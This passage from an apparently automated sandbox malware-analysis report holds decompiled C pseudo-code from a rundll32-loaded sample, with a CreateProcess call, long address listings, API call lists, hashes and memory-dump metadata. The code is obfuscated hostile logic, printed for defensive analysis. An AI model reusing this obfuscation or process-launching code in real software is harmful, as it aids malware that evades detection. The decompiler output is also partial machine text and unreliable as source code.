                                                                                                                      						E002BE7CE(E002BAB66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
                                                                                                                      						_t401 = _v1592;
                                                                                                                      						E002BAE03(_t401, _v1664, _v1636, _t385);
                                                                                                                      						_t436 =  &(_t436[0x17]);
                                                                                                                      						_t429 = 0x3b58d4d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t429 == 0xc405385) {
                                                                                                                      						_t401 = 0x208;
                                                                                                                      						E002D1310(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
                                                                                                                      						_t436 =  &(_t436[4]);
                                                                                                                      						_t429 = 0x35deb36;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					_t445 = _t429 - 0xe3616dc;
                                                                                                                      					if(_t429 == 0xe3616dc) {
                                                                                                                      						_push(_v1716);
                                                                                                                      						_push(_v1632);
                                                                                                                      						_push(0x2b115c);
                                                                                                                      						_t393 = E002CFC96(_v1576, _v1640, E002BAB66(_v1596, _v1684, _t445), _v1708,  &_v1560); // executed
                                                                                                                      						asm("sbb edi, edi");
                                                                                                                      						_t401 = _v1700;
                                                                                                                      						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
                                                                                                                      						E002BAE03(_t401, _v1604, _v1668, _t391);
                                                                                                                      						_t436 =  &(_t436[8]);
                                                                                                                      					}
                                                                                                                      					L20:
                                                                                                                      					if(_t429 != 0x74a6920) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L23;
                                                                                                                      				}
                                                                                                                      				_t435 = E002CE35A();
                                                                                                                      				_t429 = 0x7ac99d0;
                                                                                                                      				goto L20;
                                                                                                                      			}
                                                                                                                      0x002c5e41
                                                                                                                      0x002c5e49
                                                                                                                      0x002c5e51
                                                                                                                      0x002c5e59
                                                                                                                      0x002c5e61
                                                                                                                      0x002c5e69
                                                                                                                      0x002c5e71
                                                                                                                      0x002c5e79
                                                                                                                      0x002c5e81
                                                                                                                      0x002c5e89
                                                                                                                      0x002c5e94
                                                                                                                      0x002c5e9c
                                                                                                                      0x002c5ea7
                                                                                                                      0x002c5eaf
                                                                                                                      0x002c5eb7
                                                                                                                      0x002c5ebf
                                                                                                                      0x002c5ec7
                                                                                                                      0x002c5ecf
                                                                                                                      0x002c5ed7
                                                                                                                      0x002c5edc
                                                                                                                      0x002c5ee4
                                                                                                                      0x002c5eec
                                                                                                                      0x002c5ef4
                                                                                                                      0x002c5ef9
                                                                                                                      0x002c5f03
                                                                                                                      0x002c5f09
                                                                                                                      0x002c5f11
                                                                                                                      0x002c5f1c
                                                                                                                      0x002c5f27
                                                                                                                      0x002c5f32
                                                                                                                      0x002c5f3a
                                                                                                                      0x002c5f42
                                                                                                                      0x002c5f47
                                                                                                                      0x002c5f4f
                                                                                                                      0x002c5f57
                                                                                                                      0x002c5f62
                                                                                                                      0x002c5f6d
                                                                                                                      0x002c5f78
                                                                                                                      0x002c5f80
                                                                                                                      0x002c5f88
                                                                                                                      0x002c5f8d
                                                                                                                      0x002c5f95
                                                                                                                      0x002c5fa0
                                                                                                                      0x002c5fab
                                                                                                                      0x002c5fb6
                                                                                                                      0x002c5fc1
                                                                                                                      0x002c5fcc
                                                                                                                      0x002c5fd7
                                                                                                                      0x002c5fdf
                                                                                                                      0x002c5fe7
                                                                                                                      0x002c5fef
                                                                                                                      0x002c5ff7
                                                                                                                      0x002c5fff
                                                                                                                      0x002c6007
                                                                                                                      0x002c600c
                                                                                                                      0x002c6011
                                                                                                                      0x002c6019
                                                                                                                      0x002c6021
                                                                                                                      0x002c602f
                                                                                                                      0x002c6034
                                                                                                                      0x002c603f
                                                                                                                      0x002c6040
                                                                                                                      0x002c6044
                                                                                                                      0x002c604c
                                                                                                                      0x002c6059
                                                                                                                      0x002c6062
                                                                                                                      0x002c6066
                                                                                                                      0x002c606e
                                                                                                                      0x002c6076
                                                                                                                      0x002c607e
                                                                                                                      0x002c6083
                                                                                                                      0x002c6088
                                                                                                                      0x002c6090
                                                                                                                      0x002c6098
                                                                                                                      0x002c60a0
                                                                                                                      0x002c60a8
                                                                                                                      0x002c60b0
                                                                                                                      0x002c60b5
                                                                                                                      0x002c60bd
                                                                                                                      0x002c60c5
                                                                                                                      0x002c60ca
                                                                                                                      0x002c60d2
                                                                                                                      0x002c60da
                                                                                                                      0x002c60e5
                                                                                                                      0x002c60f0
                                                                                                                      0x002c60fb
                                                                                                                      0x002c6109
                                                                                                                      0x002c610d
                                                                                                                      0x002c6115
                                                                                                                      0x002c611d
                                                                                                                      0x002c6125
                                                                                                                      0x002c612d
                                                                                                                      0x002c6135
                                                                                                                      0x002c613a
                                                                                                                      0x002c6142
                                                                                                                      0x002c614d
                                                                                                                      0x002c6158
                                                                                                                      0x002c6163
                                                                                                                      0x002c616b
                                                                                                                      0x002c6173
                                                                                                                      0x002c6178
                                                                                                                      0x002c6180
                                                                                                                      0x002c6193
                                                                                                                      0x002c619a
                                                                                                                      0x002c61a5
                                                                                                                      0x002c61ad
                                                                                                                      0x002c61b7
                                                                                                                      0x002c61c0
                                                                                                                      0x002c61c4
                                                                                                                      0x002c61cc
                                                                                                                      0x002c61d4
                                                                                                                      0x002c61dc
                                                                                                                      0x002c61e1
                                                                                                                      0x002c61e9
                                                                                                                      0x002c61f1
                                                                                                                      0x002c61f9
                                                                                                                      0x002c61fe
                                                                                                                      0x002c6206
                                                                                                                      0x002c620e
                                                                                                                      0x002c6219
                                                                                                                      0x002c6224
                                                                                                                      0x002c622f
                                                                                                                      0x002c623c
                                                                                                                      0x002c6243
                                                                                                                      0x002c6247
                                                                                                                      0x002c624c
                                                                                                                      0x002c6254
                                                                                                                      0x002c625c
                                                                                                                      0x002c6261
                                                                                                                      0x002c6266
                                                                                                                      0x002c626e
                                                                                                                      0x002c6276
                                                                                                                      0x002c627b
                                                                                                                      0x002c6280
                                                                                                                      0x002c6288
                                                                                                                      0x002c629a
                                                                                                                      0x002c648d
                                                                                                                      0x002c6491
                                                                                                                      0x002c6495
                                                                                                                      0x002c649c
                                                                                                                      0x002c649d
                                                                                                                      0x002c649e
                                                                                                                      0x002c64a9
                                                                                                                      0x002c64aa
                                                                                                                      0x002c64ad
                                                                                                                      0x002c64b7
                                                                                                                      0x002c64b7
                                                                                                                      0x002c64bb
                                                                                                                      0x002c64c4
                                                                                                                      0x002c64c4
                                                                                                                      0x002c62a6
                                                                                                                      0x002c6427
                                                                                                                      0x002c6429
                                                                                                                      0x002c642d
                                                                                                                      0x002c6462
                                                                                                                      0x002c6462
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c642f
                                                                                                                      0x002c642f
                                                                                                                      0x002c642f
                                                                                                                      0x002c6433
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c6435
                                                                                                                      0x002c644a
                                                                                                                      0x002c644a
                                                                                                                      0x002c644d
                                                                                                                      0x002c6450
                                                                                                                      0x002c6453
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c643e
                                                                                                                      0x002c6442
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c6444
                                                                                                                      0x002c6447
                                                                                                                      0x002c6447
                                                                                                                      0x002c6447
                                                                                                                      0x002c6455
                                                                                                                      0x002c6455
                                                                                                                      0x002c6457
                                                                                                                      0x002c645a
                                                                                                                      0x002c645a
                                                                                                                      0x002c645d
                                                                                                                      0x002c645d
                                                                                                                      0x00000000
                                                                                                                      0x002c642f
                                                                                                                      0x002c62b2
                                                                                                                      0x002c6368
                                                                                                                      0x002c638e
                                                                                                                      0x002c63aa
                                                                                                                      0x002c63af
                                                                                                                      0x002c63b3
                                                                                                                      0x002c63bf
                                                                                                                      0x002c63fd
                                                                                                                      0x002c640e
                                                                                                                      0x002c6415
                                                                                                                      0x002c641a
                                                                                                                      0x002c641d
                                                                                                                      0x00000000
                                                                                                                      0x002c641d
                                                                                                                      0x002c62be
                                                                                                                      0x002c6342
                                                                                                                      0x002c6356
                                                                                                                      0x002c635b
                                                                                                                      0x002c635e
                                                                                                                      0x00000000
                                                                                                                      0x002c635e
                                                                                                                      0x002c62c0
                                                                                                                      0x002c62c6
                                                                                                                      0x002c62cc
                                                                                                                      0x002c62d0
                                                                                                                      0x002c62df
                                                                                                                      0x002c6303
                                                                                                                      0x002c6318
                                                                                                                      0x002c631a
                                                                                                                      0x002c6324
                                                                                                                      0x002c632a
                                                                                                                      0x002c632f
                                                                                                                      0x002c632f
                                                                                                                      0x002c647f
                                                                                                                      0x002c6485
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c648b
                                                                                                                      0x002c6478
                                                                                                                      0x002c647a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 1514166925-82791160
                                                                                                                      • Opcode ID: b3bb1fb3bd98d4b63a90ff562137d282f7ce1beb1f41915249a49fee41a89dec
                                                                                                                      • Instruction ID: 3cf23ae981ede0175c7f0822225aee1372be92b94d6c59a4bc40357d93d6a8bf
                                                                                                                      • Opcode Fuzzy Hash: b3bb1fb3bd98d4b63a90ff562137d282f7ce1beb1f41915249a49fee41a89dec
                                                                                                                      • Instruction Fuzzy Hash: 1A0213725083819FD3A8CF65C58AA4BBBE1FBC5748F508A1DF1DA86260D7B08959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 280 2b9700-2b99cc call 2bcf25 call 2d1310 call 2c679c 286 2b99d1-2b99d6 280->286 287 2b99d8-2b99da 286->287 288 2b9a15 286->288 289 2b99e8-2b9a13 call 2c4dad * 2 287->289 290 2b99dc-2b99e2 287->290 291 2b9a17-2b9a1d 288->291 292 2b99e3-2b99e6 289->292 290->292 292->291
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E002B9700(WCHAR* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t207;
                                                                                                                      				void* _t231;
                                                                                                                      				void* _t232;
                                                                                                                      				signed int _t237;
                                                                                                                      				signed int _t238;
                                                                                                                      				signed int _t239;
                                                                                                                      				signed int _t240;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				void* _t243;
                                                                                                                      				intOrPtr _t265;
                                                                                                                      				WCHAR* _t268;
                                                                                                                      				void* _t271;
                                                                                                                      				void* _t272;
                                                                                                                      
                                                                                                                      				_t271 = _t272 - 0x58;
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x7c)));
                                                                                                                      				_t265 =  *((intOrPtr*)(_t271 + 0x6c));
                                                                                                                      				_t268 = __ecx;
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x74)));
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x70)));
                                                                                                                      				_push(_t265);
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x68)));
                                                                                                                      				_push(0);
                                                                                                                      				_push( *((intOrPtr*)(_t271 + 0x60)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t207);
                                                                                                                      				 *(_t271 + 0x40) = 0x9c1626;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 8;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 4;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) + 0xfbea;
                                                                                                                      				 *(_t271 + 0x40) =  *(_t271 + 0x40) ^ 0xc166ab3f;
                                                                                                                      				 *(_t271 + 0x50) = 0x2d866;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0xffff915f;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0x9947;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) << 8;
                                                                                                                      				 *(_t271 + 0x50) =  *(_t271 + 0x50) ^ 0x03009f0e;
                                                                                                                      				 *(_t271 + 0x1c) = 0xb11a6d;
                                                                                                                      				_t237 = 0x61;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) * 0x53;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) | 0x3495d398;
                                                                                                                      				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) ^ 0x3dfc3820;
                                                                                                                      				 *(_t271 + 0x28) = 0x82663;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) * 0x55;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) / _t237;
                                                                                                                      				 *(_t271 + 0x28) =  *(_t271 + 0x28) ^ 0x000fae18;
                                                                                                                      				 *(_t271 + 0xc) = 0xaf113;
                                                                                                                      				 *(_t271 + 0xc) =  *(_t271 + 0xc) | 0x96b3e95f;
                                                                                                                      				 *(_t271 + 0xc) =  *(_t271 + 0xc) ^ 0x96be4803;
                                                                                                                      				 *(_t271 + 0x30) = 0x440ee2;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) << 2;
                                                                                                                      				_t238 = 0x3a;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) * 0x27;
                                                                                                                      				 *(_t271 + 0x30) =  *(_t271 + 0x30) ^ 0x297e7faa;
                                                                                                                      				 *(_t271 + 8) = 0x67057e;
                                                                                                                      				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7e99d1b;
                                                                                                                      				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7839d84;
                                                                                                                      				 *(_t271 + 0x38) = 0x1c9970;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) * 0x7c;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) + 0xffff63ab;
                                                                                                                      				 *(_t271 + 0x38) =  *(_t271 + 0x38) ^ 0x0ddf815b;
                                                                                                                      				 *(_t271 + 0x54) = 0x9de9b7;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) / _t238;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) | 0x8a1e8ac2;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) + 0x89e3;
                                                                                                                      				 *(_t271 + 0x54) =  *(_t271 + 0x54) ^ 0x8a1a691c;
                                                                                                                      				 *(_t271 + 0x48) = 0xcb1eea;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) + 0xac00;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x8f71cfce;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0xa15123d8;
                                                                                                                      				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x2ee8c557;
                                                                                                                      				 *(_t271 + 0x20) = 0xb0d713;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) + 0xc72b;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) >> 4;
                                                                                                                      				 *(_t271 + 0x20) =  *(_t271 + 0x20) ^ 0x0005ac28;
                                                                                                                      				 *(_t271 + 0x18) = 0xfc2615;
                                                                                                                      				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29594ddd;
                                                                                                                      				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29a8e047;
                                                                                                                      				 *(_t271 + 0x4c) = 0x55d93;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x83f0b4dd;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) * 0x1f;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) >> 6;
                                                                                                                      				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x03ebee2a;
                                                                                                                      				 *(_t271 + 0x24) = 0xa7d31;
                                                                                                                      				_t239 = 0x67;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) / _t239;
                                                                                                                      				_t240 = 0x64;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) * 0x77;
                                                                                                                      				 *(_t271 + 0x24) =  *(_t271 + 0x24) ^ 0x000a2b61;
                                                                                                                      				 *(_t271 + 0x14) = 0x947781;
                                                                                                                      				_t241 = 0x11;
                                                                                                                      				 *(_t271 + 0x14) =  *(_t271 + 0x14) / _t240;
                                                                                                                      				 *(_t271 + 0x14) =  *(_t271 + 0x14) ^ 0x0008efbc;
                                                                                                                      				 *(_t271 + 0x2c) = 0x75c872;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) / _t241;
                                                                                                                      				_t242 = 0x74;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) * 0x27;
                                                                                                                      				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) ^ 0x010d2973;
                                                                                                                      				 *(_t271 + 0x10) = 0x81f543;
                                                                                                                      				_t149 = _t271 - 0x4c; // 0x10f16291
                                                                                                                      				 *(_t271 + 0x10) =  *(_t271 + 0x10) / _t242;
                                                                                                                      				 *(_t271 + 0x10) =  *(_t271 + 0x10) ^ 0x0000d691;
                                                                                                                      				 *(_t271 + 0x3c) = 0x7405f8;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xe39458d4;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xc0d1562e;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) + 0xffff0384;
                                                                                                                      				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0x233c26a4;
                                                                                                                      				 *(_t271 + 0x34) = 0x5a2607;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) | 0x05401af1;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbbb735af;
                                                                                                                      				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbee5cf81;
                                                                                                                      				 *(_t271 + 0x44) = 0xea1272;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xffff82c7;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) | 0x60f8fd5f;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xdb64;
                                                                                                                      				 *(_t271 + 0x44) =  *(_t271 + 0x44) ^ 0x60f501b5;
                                                                                                                      				_push( *(_t271 + 0x28));
                                                                                                                      				_push( *(_t271 + 0x1c));
                                                                                                                      				_push( *(_t271 + 0x50));
                                                                                                                      				_push( *(_t271 + 0x40));
                                                                                                                      				_t243 = 0x44;
                                                                                                                      				E002D1310(_t243, _t149);
                                                                                                                      				 *((intOrPtr*)(_t271 - 0x4c)) = 0x44;
                                                                                                                      				_t183 = _t271 - 0x4c; // 0x10f16291
                                                                                                                      				_t189 = _t271 - 8; // 0x10f162d5
                                                                                                                      				_t231 = E002C679C(_t268,  *(_t271 + 0xc), _t189,  *(_t271 + 0x30), _t243,  *(_t271 + 8),  *(_t271 + 0x38),  *(_t271 + 0x54),  *(_t271 + 0x48), _t243, _t183,  *(_t271 + 0x20), _t243,  *(_t271 + 0x18), _t243, _t243,  *((intOrPtr*)(_t271 + 0x70)),  *((intOrPtr*)(_t271 + 0x60))); // executed
                                                                                                                      				if(_t231 == 0) {
                                                                                                                      					_t232 = 0;
                                                                                                                      				} else {
                                                                                                                      					if(_t265 == 0) {
                                                                                                                      						E002C4DAD( *(_t271 + 0x4c),  *(_t271 + 0x24),  *((intOrPtr*)(_t271 - 8)),  *(_t271 + 0x14),  *(_t271 + 0x2c));
                                                                                                                      						E002C4DAD( *(_t271 + 0x10),  *(_t271 + 0x3c),  *((intOrPtr*)(_t271 - 4)),  *(_t271 + 0x34),  *(_t271 + 0x44));
                                                                                                                      					} else {
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      						asm("movsd");
                                                                                                                      					}
                                                                                                                      					_t232 = 1;
                                                                                                                      				}
                                                                                                                      				return _t232;
                                                                                                                      			}

















                                                                                                                      0x002b9846
                                                                                                                      0x002b984d
                                                                                                                      0x002b9854
                                                                                                                      0x002b985b
                                                                                                                      0x002b9862
                                                                                                                      0x002b9866
                                                                                                                      0x002b986d
                                                                                                                      0x002b9874
                                                                                                                      0x002b987b
                                                                                                                      0x002b9882
                                                                                                                      0x002b9889
                                                                                                                      0x002b9894
                                                                                                                      0x002b9899
                                                                                                                      0x002b989d
                                                                                                                      0x002b98a4
                                                                                                                      0x002b98b0
                                                                                                                      0x002b98b5
                                                                                                                      0x002b98be
                                                                                                                      0x002b98c1
                                                                                                                      0x002b98c4
                                                                                                                      0x002b98cb
                                                                                                                      0x002b98d7
                                                                                                                      0x002b98d8
                                                                                                                      0x002b98dd
                                                                                                                      0x002b98e4
                                                                                                                      0x002b98f2
                                                                                                                      0x002b98fb
                                                                                                                      0x002b98fc
                                                                                                                      0x002b98ff
                                                                                                                      0x002b9906
                                                                                                                      0x002b9912
                                                                                                                      0x002b9915
                                                                                                                      0x002b9918
                                                                                                                      0x002b991f
                                                                                                                      0x002b9926
                                                                                                                      0x002b992d
                                                                                                                      0x002b9934
                                                                                                                      0x002b993b
                                                                                                                      0x002b9942
                                                                                                                      0x002b9949
                                                                                                                      0x002b9950
                                                                                                                      0x002b9957
                                                                                                                      0x002b995e
                                                                                                                      0x002b9965
                                                                                                                      0x002b996c
                                                                                                                      0x002b9973
                                                                                                                      0x002b997a
                                                                                                                      0x002b9981
                                                                                                                      0x002b9984
                                                                                                                      0x002b9987
                                                                                                                      0x002b998a
                                                                                                                      0x002b998f
                                                                                                                      0x002b9990
                                                                                                                      0x002b9998
                                                                                                                      0x002b999f
                                                                                                                      0x002b99b6
                                                                                                                      0x002b99cc
                                                                                                                      0x002b99d6
                                                                                                                      0x002b9a15
                                                                                                                      0x002b99d8
                                                                                                                      0x002b99da
                                                                                                                      0x002b99f7
                                                                                                                      0x002b9a0b
                                                                                                                      0x002b99dc
                                                                                                                      0x002b99df
                                                                                                                      0x002b99e0
                                                                                                                      0x002b99e1
                                                                                                                      0x002b99e2
                                                                                                                      0x002b99e2
                                                                                                                      0x002b99e5
                                                                                                                      0x002b99e5
                                                                                                                      0x002b9a1d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: a+
                                                                                                                      • API String ID: 963392458-552692850
                                                                                                                      • Opcode ID: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction ID: e381018d16f91120bc0645384f3c14c520e1d1f6b3ad34424548932b01c93f16
                                                                                                                      • Opcode Fuzzy Hash: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction Fuzzy Hash: 80A10272510248EFDF59CF64C94A9CE3BA2FF44348F119219FE199A260D3B6D9A5CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(00588A68), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(00588A68), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
